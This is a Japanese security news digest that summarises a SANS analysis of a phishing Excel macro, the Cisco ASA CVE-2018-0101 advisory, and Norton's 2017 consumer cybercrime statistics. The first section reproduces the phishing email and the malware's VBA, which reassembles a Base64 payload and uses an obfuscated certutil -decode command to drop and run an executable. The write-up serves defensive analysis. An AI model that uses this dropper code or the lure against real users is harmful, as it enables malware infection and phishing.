悪意のあるマクロを含む Excel シートによる単純だが効果的な攻撃方法

元記事 SANS ISC InfoSec Forums

• Simple but Effective Malicious XLS Sheet - SANS Internet Storm Center
• 元原稿著者: Xavier Mertens (@xme) 氏

概要

• あるフィッシング攻撃に利用されていたマクロ入り Excel ファイルが単純だが非常に効果的な方法を採用していたので紹介
• 検体は HIS Markit が運営する Jane's 360 サイトからであることを偽装したメール

フィッシングメールの文面

Greetings!

Attached you can find Upcoming Defense, Military and Intelligence event calendar.

Note: If you have trouble viewing the document you can try to enable content to resolve the issue.

Regards,

Jane's 360 By IHS Markit

IHS Global Limited: Registered in England under company number 00788737. Registered office: The Capitol Building, Oldbury, Bracknell, Berkshire, RG12 8FZ, UK.This email message, including accompanying communications and attachments, is strictly confidential, for the sole use of the intended recipient(s) and may contain privileged information. Any unauthorized use, review, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message. Thank you.

Please consider the environment before printing this e-mail.

添付ファイル名

• Upcoming Events February 2018.xls
• SHA1: b06930c9809ab5e4cb6659089ac6fcec470c9c16 (VirusTotal では検出なし)

• 以下の YARA ルールに抵触する

  • contentis_base64
  • maldoc_OLE_file_magic_number
  • office_document_vba
  • Base64_encoded_Executable
  • url
  • with_urls
  • without_attachments
  • without_images
  • Contains_VBA_macro_code
  • domain

埋め込まれている VBA マクロについて

• Microsoft Windows 組み込みのツールを使って攻撃している
• Excel ファイルの悪意のあるペイロードは、複数のセルに Base64 でエンコードされて格納されている
• 関数でこれらのセルの内容を読み込み、つなぎ合わせることで特定の文字列を生成する仕組み

 Function GetVal(sr As Long, er As Long, c As Long)
     Dim x
     For i = sr To er
         x = x + Cells(i, c)
     Next
     GetVal = x
 End Function
 …
 p = GetVal(2227, 2248, 170)

• エンコードされている文字列の先頭が「TV(oA|pB|pQ|qA|qQ|ro)」ならそのファイルは Windows PE ファイル
• 生成された文字列をデコードするのに PowerShell か VB を使っても良いが、同じ用途で certutil.exe が使える
• このケースでは偽の証明書ファイルが生成され certutil.exe に渡される
• 以下は整形してある

 Sub cutil(code As String)
     Dim x As String
    x = "-----BEG" & "IN CER" & "TIFI" & "CATE-----"
    x = x + vbNewLine
    x = x + code
    x = x + vbNewLine
    x = x + "-----E" & "ND CERTIF" & "ICATE-----"
     Dim path As String
    Dim expath As String
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
    path = "C:\Programdata\" & GetRand & ".txt"
    expath = "C:\Programdata\" & GetRand & ".exe"
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject")
    Set file = scr.CreateTextFile(path, True)
    file.Write x
    file.Close
     Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
    Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
    // Decoded command:
    // certutil -decode C:\Programdata\<random>.txt C:\Programdata\<random>.exe
    Sleep 2000
    // Let’s launch our payload!
    Shell (expath)
 End Sub

Windows PE ファイル

• SHA256: ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8
• VirusTotal では検出なし

まとめ

• マルウェアの拡散に悪意のあるコンテンツを HTTP 経由でダウンロードせずに済むので検出を回避しやすい

参考リンク

• Microsoft BITS (Background Intelligent Transfer Service) ツールを利用する活動の調査 (https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/)
• certutil.exe について

Cisco ASA のソフトウェアにリモート コード 実行およびサービス拒否の脆弱性

一次ソース: Cisco Security Advisory

tools.cisco.com

日本語版

https://www.cisco.com/c/ja_jp/support/docs/csa/2018/cisco-sa-20180129-asa1.pdf?dtid=osscdc000334

概要: Cisco 適応型セキュリティアプライアンス (ASA) ソフトウェアにリモートコード実行およびサービス拒否の脆弱性

• Cisco Adaptive Security アプライアンス (ASA) ソフトウェアの SSL (Secure Sockets Layer) の VPN 機能に脆弱性がある
• 当該脆弱性を悪用すると、リモートの攻撃者が不正に対象システムのリロードを行ったり、任意のコードを実行できるようになる
• 影響を受けるバージョンの Cisco の ASA デバイス上で webvpn 機能が有効になっていると、ある領域のメモリが二重解放されうる脆弱性がある 参考
• リモートの攻撃者は細工した XML パケットを複数 webvpn が有効になったインタフェースに送信することにより当該脆弱性を悪用することができる
• エクスプロイトにより攻撃者は任意のコードを実行し、システムを完全な制御下におき、脆弱性のあるデバイスをリロードさせることができる
• Cisco はすでに本脆弱性について修正版ソフトウェア(後述)をリリースしている
  • 更新以外の回避策はなし
• 公式アドバイザリ
• 簡易日本語版

CVE

• 対応する CVE: CVE-2018-0101
• Cisco Bug ID: CSCvg35618
• CVSS スコア: 10.0

修正ソフトウェア

ASA

FTD ソフトウェア

[1] 6.2.2 未満のバージョンの FTD にはリモートアクセス VPN 機能がないため

修正ソフトウェア以外による回避策

なし

影響を受ける製品

• 3000 シリーズ産業セキュリティ アプライアンス モデル（ISA）
• ASA 5500 シリーズ適応型セキュリティ アプライアンス
• Cisco ASA 5500-X シリーズ次世代ファイアウォール製品群
• Cisco Catalyst 6500 シリーズ スイッチおよび Cisco 7600 シリーズ ルータ用の ASA サービス モジュール
• ASA 1000V クラウド ファイアウォール
• 適応型セキュリティ仮想アプライアンス（ASAv）
• FirePOWER 2100 シリーズ セキュリティ アプライアンス
• Firepower 4110 セキュリティ アプライアンス
• FirePOWER 9300 ASA セキュリティ モジュール
• Firepower Threat Defense ソフトウェア（FTD)

影響を受ける条件

上記該当製品の影響を受けるバージョンのソフトウェアを稼働しておりかつ webvpn が有効になっていること

影響を受けるかどうかを確認する方法

1. CLI で管理者権限で以下のコマンドを実行して「webvpn」が返されるかどうか。返された場合は対象となる。

ciscoasa# show running-config webvpn

webvpn

1. show asp table socket コマンドを実行し、443/tcp 上の SSL および DTLS のリッスンソケット有無についても確認する。当該脆弱性を悪用するには 443/tcp 上の SSL および DTLS のリッスンソケットが存在している必要があるため。

443/tcp 上のリッスンソケットの出力例:

ciscoasa# show asp table socket

Protocol Socket State Local Address Foreign Address

SSL 00005898 LISTEN 10.48.66.202:8443 0.0.0.0:*

TCP 00009718 LISTEN 10.48.66.202:23 0.0.0.0:*

TCP 0000e708 LISTEN 10.48.66.202:22 0.0.0.0:*

SSL 00011cc8 LISTEN 10.48.66.202:443 0.0.0.0:*

DTLS 000172f8 LISTEN 10.48.66.202:443 0.0.0.0:*

ASA ソフトウェアバージョンの確認方法

以下のコマンドを実行する

ciscoasa# show version | include Version

FTD ソフトウェアの場合

ciscoasa# show version

一次ソース

2017 ノートン サイバーセキュリティ インサイトレポート: グローバル篇 2017 Norton Cyber Security Insights Report Global Results ※ レポートが長いため 5 回に分割

• 一次ソース
• 得られた知見
  • 消費者は自身のサイバーセキュリティ知識について自信過剰
  • サイバー犯罪被害者はサイバーセキュリティについて言行不一致
  • ミレニアル世代 (2000 年以降生まれ)、その両親 (団塊ジュニア)、そしてベビーブーマー世代 (団塊世代) まで、全世代でセキュリティに関してほぼ「ノーガード戦法」

得られた知見

消費者は自身のサイバーセキュリティ知識について自信過剰

• 過剰な自信が自身を危険に晒し、サイバー犯罪者はその弱みにつけいって記録的成功をおさめる
• 2017 年は 20 カ国で 9 億 7800 万人がサイバー犯罪による影響を受けた
• 消費者の 44% が過去 12 ヶ月にサイバー攻撃による影響を受けた
• 消費者または消費者の知り合いが経験した最も一般的なサイバー犯罪には次のものがあげられる
  • 所有しているデバイスがウイルスその他のセキュリティ上の脅威に感染した (53%)
  • デビットカードないしクレジットカードの詐欺にあった (38%)
  • アカウントのパスワードが漏えいした (34%)
  • メールアカウントまたはソーシャルアカウントに不正アクセスないしハッキングを受けた (34%)
  • オンラインショッピングが詐欺だった (33%)
  • 詐欺メールをクリックした、または詐欺メールに対して個人情報や機微な金融情報をうっかり提供してしまった (32%)
• この結果、サイバー犯罪の犠牲となった被害者は全世界で 1720 億ドル (19兆円) の損害を受け、一人あたりの平均では 142 ドル (1万5千円) を失った
• また全世界で 24 時間近く (またはフルタイム勤務の 3 日分) の時間を後始末のために費やした

サイバー犯罪被害者はサイバーセキュリティについて言行不一致

• 口ではサイバーセキュリティの大切さを説きながら行動が伴わず結果的に自分自身をサイバー犯罪の危険にさらしている
• 被害者に見られる 3 つの特徴
  1. 自身のサイバーセキュリティスキルに自信過剰
     • サイバー犯罪の被害者の方が被害にあわなかった人々よりもサイバーセキュリティの重要性をよく口にするが行動が伴わず単純なミスをしがち
     • 消費者の 44% がサイバー犯罪被害にあっているが、被害者の 39% は自身の機密情報の保護に自信があり 33% は自身の行動はリスクが低いと信じている
  2. いくつものデバイスを愛用する
     • 新しもの好きでいくつもデバイスを愛用している人ほどサイバー犯罪の被害に合いやすい
     • 犯罪被害に合っていない人々ではゲーム機とスマートデバイスの両方を所有していたのは 28% だったが、犯罪被害にあった人々では 37% が両方を所有
     • 犯罪被害者では IoT ホームデバイス所有率が被害にあっていない人々のほとんど 2 倍
  3. 基本的な対策を怠る
     • 消費者はセキュリティ技術の導入には積極的で、指紋認証(44%)、顔認証(13%)、パターンマッチング(22%)、パーソナルVPN(16%)、声紋認証(10%)、二要素認証(13%)は実践している
     • ところが犯罪被害者は世界的に同じパスワードをすべてのオンラインアカウントで使いまわしており、58% は少なくとも 1 つのデバイスまたはアカウントのパスワードを他人と共有している。一方被害にあっていない人々の場合、同じパスワードをすべてのオンラインアカウントで使いまわしているのは 17% にとどまり、またパスワードの共有も 37% にとどまる

ミレニアル世代 (2000 年以降生まれ)、その両親 (団塊ジュニア)、そしてベビーブーマー世代 (団塊世代) まで、全世代でセキュリティに関してほぼ「ノーガード戦法」

• ミレニアル世代
  • 最もデジタル機器に慣れ親しんでいる世代で、最も多くのガジェットを所有している (平均 4 台)
  • もっとも高度なセキュリティ対策を実施 (32%): パターンマッチング、顔認証、VPN、声紋認証、二要素認証など
  • ところが単純なセキュリティ対策ミスもおかしがちで、パスワード管理がずさん(70%) でサイバー犯罪の被害者になりやすい
  • 去年 1 年だけで全世界のミレニアル世代の 60% がサイバー犯罪被害にあっている
  • 4 人に 1 人 (26%) のミレニアル世代ユーザーは同一パスワードをすべてのアカウントに使いまわしている (団塊世代では 10% のみ)
  • 全世界でミレニアル世代の 63% が少なくとも 1 つ以上のパスワードを他者と共有している (団塊の世代では 36% のみ)
• 団塊の世代とそれより上の世代はもっとも安全な年齢グループだが失敗もおかす
  • 全世界で団塊の世代の 61% とそれより上の世代の 2/3 が異なるパスワードを使っているが、それぞれ 39% と 49% はパスワードを紙に書いている
  • 団塊世代より上はデバイスのバックアップをもっともないがしろにする世代で、16% はどんなデバイスのバックアップも行っていない
  • 団塊世代は平均して 167 ドルの損害を被っており、これは全年代グループで最も高く、世界平均より 15% も高い点に注目すべき
• 団塊ジュニア世代は子どもとインターネットについては心配の種が多い
  • 実際には 96% の団塊ジュニア世代が子供とインターネットについて心配だと口にするが、オンラインゲーム、ソーシャルメディア、インターネットサーフィンをする子供の行動を監督している親は 1/3 にとどまる
  • 一方、全世界で 11 % の団塊ジュニア世代は子供をオンラインで守るために何の行動も起こしていない